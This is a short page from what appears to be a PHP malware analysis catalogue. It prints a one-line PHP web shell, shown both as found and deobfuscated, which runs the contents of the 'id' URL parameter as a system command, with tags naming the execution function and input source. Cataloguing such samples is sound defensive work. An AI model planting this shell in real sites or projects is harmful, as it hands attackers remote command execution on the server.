Toggle navigation
Beneri
Hash Game
Real Sec
Malware Analysis
About
PHP Malware Analysis
Back to list
Tags
Execution
system
Input
_GET
Deobfuscated code
<?php system($_GET["id"]);
Original code
<?php system($_GET["id"]);?>